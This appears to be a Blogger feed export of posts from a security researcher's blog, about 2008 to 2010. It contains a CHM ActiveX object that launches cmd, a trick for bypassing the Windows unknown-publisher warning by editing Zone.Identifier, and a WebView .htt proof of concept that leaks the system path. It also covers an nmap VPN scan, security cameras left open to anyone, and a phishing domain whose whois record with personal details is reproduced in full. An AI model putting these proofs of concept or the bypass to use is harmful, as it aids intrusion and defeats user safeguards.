tag:blogger.com,1999:blog-91147705216894366302018-09-16T21:03:46.227-07:00CodeTroubleRafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.comBlogger18125tag:blogger.com,1999:blog-9114770521689436630.post-19557980490596846582010-03-20T03:14:00.001-07:002010-03-20T03:18:07.303-07:00If we could only control that window class...<pre><br />This is an example of a file run from within a local chm file.<br />Local chm files are considered as executables.<br />The following is a research into an interesting bug and NOT a<br />discussion on a practical security vulnerability. <br /><br />[OBJECT<br /> id=hh<br /> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"<br /> width=100<br /> height=100<br />]<br /> [PARAM name="Command" value="ShortCut"]<br /> [PARAM name="Button" value="Bitmap:shortcut"]<br /> [PARAM name="Item1" value=",cmd,/c"]<br /> [PARAM name="Item2" value="273,1,1"]<br />[/OBJECT]<br /><br />[script]<br /><br /> // The chm loads, executes a process and the process is closed<br /> // The the script clicks the shortcut object after the process has already been closed<br /> // then hh.exe tries to create an error message using a format string (wsprintfA). The error message is:<br /> // "The program specified for the shortcut was started, but the window class "%s" could not be found."<br /> // Then there is an attempt to read from the window class that was assigned to the process executed, which was<br /> // FREEed/destroyed/released when the process was closed. This causes the address that is pulled from the stack to be 3 letters <br /> // from the error message itself and another byte " th\x54"<br /><br /> // an exploitation would require to be able to manipulate the window class<br /> // a proper fix would be one of the following:<br /> // 1) Checking if the window class still exists before using it<br /> // 2) making a copy of the window class upon process creation and using that copy<br /> // 3) removing the format string message<br /><br /> hh.Click();<br />[/script]<br /></pre>Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-62321772185683486002009-12-11T02:51:00.000-08:002009-12-11T03:24:16.836-08:00Using Nmap Remotely Through F5 FirePass VPNWell, we all use the common hacking tools of the trade like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows. <div>I was connected to a network remotely through the company's F5 VPN appliance and I wanted to scan the internal network.</div><div><br /></div><div>It looked like:</div><div><div><span class="Apple-tab-span" style="white-space:pre"> </span>Microsoft Windows XP [Version 5.1.2600]</div><div><span class="Apple-tab-span" style="white-space:pre"> </span>(C) Copyright 1985-2001 Microsoft Corp.</div><div><span class="Apple-tab-span" style="white-space:pre"> </span></div><div><span class="Apple-tab-span" style="white-space:pre"> </span>C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 192.168.1.*</div><div><br /></div><div>Once I pressed "Enter" I got:</div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; ">Time</span></span></span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won't </span><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">work on Windows.</span></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><br /></span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">system cannot </span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">find the device specified. (20). Will wait 5 seconds then retry.</span></span></span></span></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><br /></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="white-space: pre; "> </span>pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">system cannot </span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">find the device specified. (20). Will wait 25 seconds then retry.</span></span></span></span></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><br /></span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening<span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="white-space: pre;"><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">adapter: The </span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">system cannot find the device specified. (20)</span></span></span></span></span></span></div><div><span class="Apple-style-span" style="font-size:small;"></span></div><div><span class="Apple-style-span" style="font-size:small;"><br /></span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">There are several possible reasons for this, depending on your operating system:</span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">LINUX: If you are getting Socket type not supported, try modprobe af_packet or <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; ">recompile <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">your </span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">kernel with SOCK_PACKET enabled.</span></span></span></span></span></span></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><br /></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">*BSD: If you are getting device not configured, you need to recompile your kernel with <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">Berkeley Packet </span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">Filter support. If you are getting No such file or directory, try creating <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; ">the <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">device (eg cd /dev; MAKEDEV </span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;"><device>; or use mknod).</device></span></span></span></span></span></span></span></span></span></span></span></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><br /></span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">because Microsoft </span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">disabled raw sockets as of Windows XP SP2. Depending on the <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; ">reason <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">for this error, it is possible that the --</span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">unprivileged command-line argument will <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; ">help.</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><br /></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">SOLARIS: If you are trying to scan localhost or the address of an interface and are getting <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">'/dev/lo0: No </span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">such file or directory' or 'lo0: No DLPI device found', complain to Sun. I <span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">don't think Solar</span><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">is can support </span><span class="Apple-style-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span><span class="Apple-style-span" style="white-space: normal; "><span class="Apple-style-span" style="font-size:small;">advanced localhost scans. You can probably use<span class="Apple-style-span" style="white-space: pre; "> <span class="Apple-style-span" style="white-space: normal; ">"-PN -sT localhost" though.</span></span></span></span></span></span></span></span></span></span></span></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-tab-span" style="white-space: pre; "></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><br /></span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">QUITTING!</span></div><div><br /></div><div>Then I realized that the VPN connection was a PPP device which is probably at the top of the device type interfaces order list and Nmap is trying to use it in order to scan, which is the point of failure because Nmap on Windows without RAW sockets (means Windows XP SP2+) can only use Ethernet devices. So I try played "Imaginary Linux on Windows" and added the option "-e eth0" which specifies using the Ethernet device indexed at 0 and it worked like a charm.</div><div><br /></div><div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 -e eth0 192.168.1.*</span></div><div><span class="Apple-style-span" style="font-size:small;"><br /></span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time</span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">Interesting ports on XXXXX (192.168.0.1):</span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">PORT STATE SERVICE</span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">445/tcp filtered microsoft-ds</span></div><div><span class="Apple-style-span" style="font-size:small;"><br /></span></div><div><span class="Apple-tab-span" style="white-space: pre; "><span class="Apple-style-span" style="font-size:small;"> </span></span><span class="Apple-style-span" style="font-size:small;">Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds</span></div></div></div>Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-52286418326956168222009-12-11T01:58:00.000-08:002009-12-11T02:29:11.568-08:00Bypassing Windows Unknown Publisher Verification For Web Downloaded ExecutablesI was in another day of jumping from a client to a client, securing another bank in Israel when my girlfriend called and said "Honey, I am at the office, I have absolutely nothing to do and I can't connect from here to our computer at home to continue my project". I said, O.K, let's see what we can do on a 5 minute phone call. Now just want to make it clear, my girlfriend is an Information System Instructor, she is no developer or hacker.<div><br /></div><div>Me: "Honey, go to http://www.teamviewer.com, can you download it?"</div><div>Her: "yes, but when I run the setup.exe it says something weired like 'windows has blocked this software because it can't verify the publisher' and it won't let me install"</div><div><br /></div><div><img src="http://3.bp.blogspot.com/_18YBLFP2tdA/SyIeGz93QeI/AAAAAAAAAFg/-DTZCAO2iEc/s400/cant+verify+publisher.JPG" style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 187px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5413922804430488034" /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>Me: "O.K, Open Start-Run, type notepad and space, now click on setup.exe and drag it to the text box at Start->Run. Now add ':Zone.Identifier' just before the last quotes. What do you see?"</div><div>Her: "I see something like ZoneId=3, now what?"<br />Me: "I can't talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye"</div><div><br /></div><div>After 10 minutes I get an SMS "thanks honey it worked!!!".</div><div>Well we found a bug, I wouldn't really call it a "Privilege Escalation" but I guess you don't have to be a hacker to bypass windows security restrictions :)</div>Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-49263717520058400642009-07-09T20:09:00.000-07:002009-12-03T23:50:55.498-08:00Exploiting WebView through Internet Explorer to remotely discover windows directoryAs for any large product, Microsoft Windows operating system is built on its previous versions code. Some of this code even goes back until Microsoft Windows 98.<br /><br />In Windows 98 a new look was introduced called "WebView" which included the way folders are displayed and the way the desktop is displayed are all HTML templates which were also editable to the default administrative user.You can read more about it here:http://msdn.microsoft.com/en-s/library/bb776835(VS.85).aspx<br /><br />Those HTML Templates had the extension "htt". In order for the folder templates to function properly and being able to display the current folder, a few automatically expended variables were added to the module filtering the "htt" files. These are:<br />%TEMPLATEDIR% (hardcoded)<br />%THISDIRPATH% (hardcoded)<br />%THISDIRNAME% (hardcoded)<br />%BACKGROUNDIMAGE% (registry)<br />%LOGOLINE% (registry)<br /><br />This mechanism lives until today deeply inside Windows XP's code in two modules inside the system32 folder:<br />1) Webvw.dll<br />2) Mshtml.dll<br /><br />Webvw.dll is the module which is responsible for all the Webview installation and normal activity and mshtml.dll is the main module for HTML Filtering &amp; Rendering used Windows Explorer and Internet Explorer.<br /><br />When Microsoft Windows is installed and webvw.dll is registered, it adds it CLSID and a few registry keys. The interesting ones are these:<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\BACKGROUNDIMAGE<br />Default = "%SystemRoot%\Web\wvleft.bmp"<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\LOGOLINE<br />Default = "%SystemRoot%\Web\wvline.gif"<br /><br />Every time an htt file is rendered, without any local-remote or any zone consideration, those variables are replaced with the current system's path.<br />This is the code inside mimeflt.cpp which contains the bug:Lines 360 to 433:<br /><pre><br />#define REG_WEBVIEW_TEMPLATE_MACROS<br />TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WebView\\TemplateMacros")<br /><br />void ConvertBytesToTChar(LPCBYTE pBuf, UINT nCharSize, LPTSTR psz, int cch) {<br /> if (SIZEOF(char) == nCharSize) {<br /> SHAnsiToTChar((LPCSTR)pBuf, psz, cch);<br /> } else {<br /> ASSERT(nCharSize == SIZEOF(WCHAR));<br /> SHUnicodeToTChar((LPCWSTR)pBuf, psz, cch);<br /> }<br />}<br /><br />void ExpandMacro(LPBYTE pszMacro, LPBYTE pszExpansion, int nBytes, UINT nCharSize) {<br /> TCHAR szExpansion[MAX_PATH];<br /> szExpansion[0] = TEXT('\0');<br /> TCHAR szTCharMacro[MAX_PATH];<br /><br /> ConvertBytesToTChar(pszMacro, nCharSize, szTCharMacro, ARRAYSIZE(szTCharMacro));<br /> TCHAR szKey[MAX_PATH];<br /> lstrcpyn(szKey, REG_WEBVIEW_TEMPLATE_MACROS, ARRAYSIZE(szKey));<br /> StrCatBuff(szKey, TEXT("\\"), ARRAYSIZE(szKey));<br /> StrCatBuff(szKey, szTCharMacro, ARRAYSIZE(szKey));<br /> HKEY hkMacros;<br /> if (RegOpenKey(HKEY_CURRENT_USER, szKey, &amp;hkMacros) == ERROR_SUCCESS &amp;&amp; RegOpenKey(HKEY_LOCAL_MACHINE, szKey, &amp;hkMacros) == ERROR_SUCCESS) {<br /> DWORD dwType;<br /> DWORD cbData = SIZEOF(szExpansion);<br /> SHQueryValueEx(hkMacros, NULL, NULL, &amp;dwType, (LPBYTE)szExpansion, &amp;cbData);<br /> RegCloseKey(hkMacros);<br /> }<br /><br /> ConvertTCharToBytes(szExpansion, nCharSize, pszExpansion, nBytes);<br />}<br /><br />int CWebViewMimeFilter::_Expand(LPBYTE pszVar, LPBYTE * ppszExp) {<br /> if (!_StrCmp(pszVar, "TEMPLATEDIR", L"TEMPLATEDIR")) {<br /> if (!_szTemplateDirPath[0]) {<br /> GetMachineTemplateDir(_szTemplateDirPath, SIZEOF(_szTemplateDirPath), _nCharSize);<br /> }<br /><br /> *ppszExp = _szTemplateDirPath;<br /><br /> } else if (!_StrCmp(pszVar, "THISDIRPATH", L"THISDIRPATH")) {<br /> if (!_szThisDirPath[0]) {<br /> _QueryForDVCMDID(DVCMDID_GETTHISDIRPATH, _szThisDirPath, SIZEOF(_szThisDirPath));<br /> }<br /> *ppszExp = _szThisDirPath;<br /><br /> } else if (!_StrCmp(pszVar, "THISDIRNAME", L"THISDIRNAME")) {<br /> if (!_szThisDirName[0]) {<br /> _QueryForDVCMDID(DVCMDID_GETTHISDIRNAME, _szThisDirName, SIZEOF(_szThisDirName));<br /> }<br /> *ppszExp = _szThisDirName;<br /><br /> } else {<br /> ExpandMacro(pszVar, _szExpansion, SIZEOF(_szExpansion), _nCharSize);<br /> *ppszExp = _szExpansion;<br /> }<br /><br /> return _StrLen(*ppszExp);<br />}<br /></pre><br />In Windows XP the variables "%THISDIRPATH%" and "%THISDIRNAME%" were removed from the Mime Filter which means %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% would still be translated into the current windows directory.<br /><br />The Proof Of Concept code (Remote WebView Macro Translation):<br />Save on a remote host with an htt extension and replace "http:///filter_trap.htt<br />--------------------------- filter_trap.htt start --------------------------------<br />[div id="BACKGROUNDIMAGE"]%BACKGROUNDIMAGE%[/div]<br />[div id="LOGOLINE"]%LOGOLINE%[/div]<br />[div id="TEMPLATEDIR"]%TEMPLATEDIR%[/div]<br />[script]<br />alert(document.getElementById("BACKGROUNDIMAGE").innerHTML);<br />alert(document.getElementById("LOGOLINE").innerHTML);<br />alert(document.getElementById("TEMPLATEDIR").innerHTML);<br />[/script]<br />--------------------------- filter_trap.htt end --------------------------------Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-83181477959872880562009-06-15T07:14:00.000-07:002009-06-15T07:16:11.735-07:00Security Cameras - To See Or Not To See?!These days, security is going digital.<br /><br />From live and automatic event log analysis up to personal "on-key" tokens and remotely controlled security cameras.<br /><br />These technologies should be used carefully. For example if the token generates 6 digits and there is no password complexity enforcement, users can set their password to "1" and then we'll get a 7 character length password. If the data from the log will not be filtered and will be in html format, it may execute code. Even worse, if it is viewed at the command line console, it may execute code using the console color control characters.<br /><br />When talking about security cameras, a security flaw in the camera's simple application server may cause the entire video stream to be accessible to an intruder.<br /><br /><br /><br />While consulting to a big financial customer, I discovered the security cameras installed are easily accessible to anyone thanks to a very simple logical flaw. Not to mention default user accounts, empty password sets, the ability to brute force, directory traversal and some classic authorization bypass vulnerabilities.<br /><br />Most of the security cameras in my country are bought from Korea, some of the software is written by the vendor and some by the distributer. Both of them should pay much more attention to security so we won't have the same classic vulnerabilities over and over again.<br /><br />Attached are a few screen captures:<br /><br /><a href="http://www.linkstofiles.com/images/11.jpg"><img alt="another white night at work" src="http://www.linkstofiles.com/images/11.jpg" width="344" height="227" /></a><br /><br />another white night at work<br /><br /><a href="http://www.linkstofiles.com/images/9.jpg"><img alt="Clothing Shop" src="http://www.linkstofiles.com/images/9.jpg" width="390" height="310" /></a><br /><br />Clothing Shop<br /><br /><a href="http://www.linkstofiles.com/images/6.jpg"><img alt="Coffee Shop" src="http://www.linkstofiles.com/images/6.jpg" width="314" height="300" /></a><br /><br />Coffee Shop<br /><br /><a href="http://www.linkstofiles.com/images/8.jpg"><img alt="Eyes on the ball!!!" src="http://www.linkstofiles.com/images/8.jpg" width="393" height="311" /></a><br /><br />Eyes on the ball!!!<br /><br /><a href="http://www.linkstofiles.com/images/10.jpg"><img alt="How's that shirt?" src="http://www.linkstofiles.com/images/10.jpg" width="392" height="309" /></a><br /><br />How's that shirt?"<br /><br /><a href="http://www.linkstofiles.com/images/19.jpg"><img alt="Anyone knows a Safe-Cracker?!" src="http://www.linkstofiles.com/images/19.jpg" width="344" height="226" /></a><br /><br />Anyone knows a Safe-Cracker?!Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-10292292938180999182009-05-04T12:35:00.000-07:002009-05-07T23:39:22.656-07:00ICQ Phishing - You Type, They SellMy friend ax1les has a 5 digit ICQ number and he always gets wiered messages that turn out to be phishing or links to trojans. A few days ago, he got this message:<br /><br /><a href="http://3.bp.blogspot.com/_18YBLFP2tdA/Sf9Ii9KecrI/AAAAAAAAAFQ/ln9M1O5zpSU/s1600-h/1.bmp"><img style="MARGIN: 0px 10px 10px 0px; WIDTH: 400px; FLOAT: left; HEIGHT: 213px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5332060249201210034" border="0" alt="" src="http://3.bp.blogspot.com/_18YBLFP2tdA/Sf9Ii9KecrI/AAAAAAAAAFQ/ln9M1O5zpSU/s400/1.bmp" /></a><br /><br />He thought it would be a good idea that we'll take a look at that website together, and we did :)<br /><br /><a href="http://3.bp.blogspot.com/_18YBLFP2tdA/Sf9I3Sc0TvI/AAAAAAAAAFY/Gtmdoef_WFg/s1600-h/2.bmp"><img style="MARGIN: 0px 10px 10px 0px; WIDTH: 400px; FLOAT: left; HEIGHT: 249px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5332060598512668402" border="0" alt="" src="http://3.bp.blogspot.com/_18YBLFP2tdA/Sf9I3Sc0TvI/AAAAAAAAAFY/Gtmdoef_WFg/s400/2.bmp" /></a><br /><a href="http://3.bp.blogspot.com/_18YBLFP2tdA/Sf9Ii9KecrI/AAAAAAAAAFQ/ln9M1O5zpSU/s1600-h/1.bmp"></a><br />In the last decade russians really mad fun of the world using the Internet.<br />The website <a href="http://icq-confirm.info/">http://icq-confirm.info/</a> is a phishing website that "confirms" your ICQ account credentials are still valid (yeah right). The amazing thing is he didn't even bother changing the title from the former text "icq.com" :)<br /><br />But of course his business is really successful as he is also the owner of the mega-icq-shop, he is trying to hide so much that he event left it in the domain's whois details......<br /><br />Domain ID:D28335226-LRMS<br />Domain Name:ICQ-CONFIRM.INFO<br />Created On:20-Apr-2009 07:27:17 UTC<br />Last Updated On:29-Apr-2009 15:01:04 UTC<br />Expiration Date:20-Apr-2010 07:27:17 UTC<br />Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)<br />Status:CLIENT TRANSFER PROHIBITED<br />Status:TRANSFER PROHIBITED<br />Registrant ID:DI_9732581<br />Registrant Name:Andrey Petrovich<br />Registrant Organization:Private person<br />Registrant Street1:Krasnoarmeyskaya 18 dom 4 kv 32<br />Registrant Street2:<br />Registrant Street3:<br />Registrant City:Moskva<br />Registrant State/Province:Moskva<br />Registrant Postal Code:132132<br />Registrant Country:RU<br />Registrant Phone:+7.4951783223<br />Registrant Phone Ext.:<br />Registrant FAX:<br />Registrant FAX Ext.:<br /><strong>Registrant Email:mega-icq-shop@mail.ru</strong><br />Admin ID:DI_9732581<br />Admin Name:Andrey Petrovich<br />Admin Organization:Private person<br />Admin Street1:Krasnoarmeyskaya 18 dom 4 kv 32<br />Admin Street2:<br />Admin Street3:<br />Admin City:Moskva<br />Admin State/Province:Moskva<br />Admin Postal Code:132132<br />Admin Country:RU<br />Admin Phone:+7.4951783223<br />Admin Phone Ext.:<br />Admin FAX:<br />Admin FAX Ext.:<br /><strong>Admin Email:mega-icq-shop@mail.ru</strong><br />Billing ID:DI_9732581<br />Billing Name:Andrey Petrovich<br />Billing Organization:Private person<br />Billing Street1:Krasnoarmeyskaya 18 dom 4 kv 32<br />Billing Street2:<br />Billing Street3:<br />Billing City:Moskva<br />Billing State/Province:Moskva<br />Billing Postal Code:132132<br />Billing Country:RU<br />Billing Phone:+7.4951783223<br />Billing Phone Ext.:<br />Billing FAX:<br />Billing FAX Ext.:<br /><strong>Billing Email:mega-icq-shop@mail.ru</strong><br />Tech ID:DI_9732581<br />Tech Name:Andrey Petrovich<br />Tech Organization:Private person<br />Tech Street1:Krasnoarmeyskaya 18 dom 4 kv 32<br />Tech Street2:<br />Tech Street3:<br />Tech City:Moskva<br />Tech State/Province:Moskva<br />Tech Postal Code:132132<br />Tech Country:RU<br />Tech Phone:+7.4951783223<br />Tech Phone Ext.:<br />Tech FAX:<br />Tech FAX Ext.:<br /><strong>Tech Email:mega-icq-shop@mail.ru</strong><br />Name Server:NS1.AGHOST.RU<br />Name Server:NS2.AGHOST.RU<br /><br />Anyway, the really wiered thing about this case is that while i am writing this post this website is not loading anymore...the DNS no longer resolves to any IP and their former IP 95.211.7.5 reponse with "Apache is working properley" when requesting the Host "icq-confirm.info".<br />May be I scared them away with a few little DNS requests or the cops just randomly knocked on their door :)Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-12217587632546976242008-12-28T22:30:00.000-08:002008-12-28T23:58:40.562-08:00The "DesktopSmiley, Not A Spyware" ToolBarThe "Not A Phishing Worm" really got me interested as it sent special Christmas messages so I decided to dig in just a bit. So as discovered, after the user supplies his MSN credentials, his friends get a link to the "Not A Phishing" website and a lot of tricky links leading to DesktopSmiley.com to download their toolbar. Which they say is "Not Spyware".<br /><br />So we got a non-phishing worm downloading a non-spyware program, let's see its non-evil actions :)<br />The first thing I did was downloading the installer, which asks no questions and shows no EULA. It is also digitally signed by "DoubleD Advertising Limited", well that's really funny, we have got to give them that :)<br /><br />So I ran it in a VM:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SVhz9s8NJTI/AAAAAAAAAE4/LNSmRCYasUg/s1600-h/virutalized.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 85px;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SVhz9s8NJTI/AAAAAAAAAE4/LNSmRCYasUg/s400/virutalized.JPG" alt="" id="BLOGGER_PHOTO_ID_5285101666592171314" border="0" /></a><br /><br /><br /><br /><br /><br />That is quite original! "A non-virtualized hardware system is required", of course anybody technical gets how lame this lie is :)<br />why would an IE toolbar "require" a "non-virtualized hardware", why would it even bother to check if it's running under a virtualized environment unless it has some illegal actions to hide?!<br /><br />Well i am defiantly not going to execute it on my machine :)<br />Maby i will test is some other day on a real machine with Restore-IT/Ghost<br /><br />In the meantime, let's take look at some of the things that it does:<br />It copies some IE settings from HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ to 